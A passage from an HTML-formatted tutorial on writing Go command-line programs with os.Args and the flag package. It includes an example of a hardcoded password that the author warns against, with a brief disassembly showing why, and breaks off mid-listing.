&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;mnt&#x2F;d&#x2F;oneDrive&#x2F;code&#x2F;go&#x2F;testing&#x2F;cli&#x2F;1&#x2F;1-2.go:10 +0x20f&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;exit status 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The error is expected as we are looping over a slice of strings, which are the arguments stored in os.Args, and there are only three arguments; the first argument being the name of the program itself, and the &quot;foo&quot; and &quot;bar&quot; supplied by us in the terminal. This can be easily fixed by finding the number of strings in os.Args, by doing the following.&lt;&#x2F;p&gt;
&lt;p&gt;ref. 1-3&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;os&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	numberOfArgs&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; len&lt;&#x2F;span&gt;&lt;span&gt;(os.Args[&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;1&lt;&#x2F;span&gt;&lt;span&gt;:])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;    for&lt;&#x2F;span&gt;&lt;span&gt; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 0&lt;&#x2F;span&gt;&lt;span&gt;; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; &amp;lt;=&lt;&#x2F;span&gt;&lt;span&gt; numberOfArgs; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;++&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		programName&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span&gt; os.Args[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Argument No. : &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%d&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; (&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%s&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, i, programName)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;This will give us the expected output, as in 1-2, but without the &quot;index out of range&quot; error. Alternatively, you could use &quot;range&quot; to enumerate the arguments instead.&lt;&#x2F;p&gt;
&lt;p&gt;ref. 1-4&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;os&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	for&lt;&#x2F;span&gt;&lt;span&gt; i, arg&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; := range&lt;&#x2F;span&gt;&lt;span&gt; os.Args[&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;1&lt;&#x2F;span&gt;&lt;span&gt;:] {&lt;&#x2F;span&gt;&lt;span style=&quot;color: #88846F;&quot;&gt; &#x2F;&#x2F; 1, not 0 because we do not want the name of the program&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Argument No.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%d&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;: &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%s\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;+&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;1&lt;&#x2F;span&gt;&lt;span&gt;, arg)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;go run 1-4.go foo bar&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Argument No.1: foo&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Argument No.2: bar&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Why you would want to use &quot;range&quot; over &quot;len&quot; would of course be completely dependent on the context, but there is no wonder which way is more concise.&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;flag.Arg(i) returns the i&#x27;th CLI argument, while flag.Args() returns the &lt;strong&gt;non-flag&lt;&#x2F;strong&gt; CLI arguments.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;h2 id=&quot;using-the-flag-package&quot;&gt;Using the flag package&lt;&#x2F;h2&gt;
&lt;p&gt;Using the flag package, we can take flags entered at the time of running the program and parse them, and hence we can do some more action with the flags&#x2F;arguments that we pass. The &lt;strong&gt;flag.StringVar&lt;&#x2F;strong&gt; function takes the following input:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;StringVar&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; func&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt;p&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; *&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt;string&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt; name&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; string&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt; value&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; string&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #FD971F;font-style: italic;&quot;&gt; usage&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; string&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;StringVar defines a string flag with specified name, default value, and usage ring. The &amp;gt; argument p points to a string variable in which to store the value of the flag.&lt;&#x2F;p&gt;
&lt;p&gt;StringVar is not the only thing that could be used; you could also use IntVar, Float64 and so on.&lt;&#x2F;p&gt;
&lt;p&gt;This means you could make programs like the following:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;flag&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	var&lt;&#x2F;span&gt;&lt;span&gt; password&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; string&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;StringVar&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;&amp;amp;&lt;&#x2F;span&gt;&lt;span&gt;password,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;p&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;password for access&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Parse&lt;&#x2F;span&gt;&lt;span&gt;()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	if&lt;&#x2F;span&gt;&lt;span&gt; password&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;password&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Println&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Access granted&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; else&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Println&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Access denied&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Please note that you should never do this, as it is really simple to disassemble the program and extract the plain text password even though the disassembly of Go is arguably more messy than of a C program, as demonstrated below.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     rcx, [rax]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     [rsp+98h+usage.str], rcx&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     rcx, [rax+8]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     [rsp+98h+usage.len], rcx&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;lea     rbp, aPassword  ; &amp;quot;password&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     [rsp+98h+var_88], rbp&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;mov     [rsp+98h+var_80], 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;call    runtime_eqstring&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;movzx   ebx, byte ptr [rsp+98h+var_78]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;cmp     bl, 0&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;jz      loc_4011B5&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;more-advanced-cli&quot;&gt;More advanced CLI&lt;&#x2F;h2&gt;
&lt;p&gt;The first more advanced CLI is using an operator, specified using the &quot;-o&quot; flag, on our arguments pairwise, for example 1 + 2, 3 + 4 and so forth.&lt;&#x2F;p&gt;
&lt;p&gt;ref 2-1&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;flag&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;os&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;strconv&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	flag.Usage&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; = func&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Println&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;My Mediocre Program - By Me&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Println&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Usage:&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;PrintDefaults&lt;&#x2F;span&gt;&lt;span&gt;()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	var&lt;&#x2F;span&gt;&lt;span&gt; operator&lt;&#x2F;span&gt;&lt;span style=&quot;color: #66D9EF;font-style: italic;&quot;&gt; string&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;StringVar&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;&amp;amp;&lt;&#x2F;span&gt;&lt;span&gt;operator,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;o&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;+&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;,&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; &amp;quot;operator to use (+, -, * or &#x2F;)&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Parse&lt;&#x2F;span&gt;&lt;span&gt;()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	if&lt;&#x2F;span&gt;&lt;span&gt; flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;NArg&lt;&#x2F;span&gt;&lt;span&gt;()&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; ==&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 0&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Usage&lt;&#x2F;span&gt;&lt;span&gt;()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		os.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Exit&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;1&lt;&#x2F;span&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;	for&lt;&#x2F;span&gt;&lt;span&gt; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 0&lt;&#x2F;span&gt;&lt;span&gt;; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; &amp;lt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; len&lt;&#x2F;span&gt;&lt;span&gt;(flag.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Args&lt;&#x2F;span&gt;&lt;span&gt;()); i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; =&lt;&#x2F;span&gt;&lt;span&gt; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; +&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 2&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
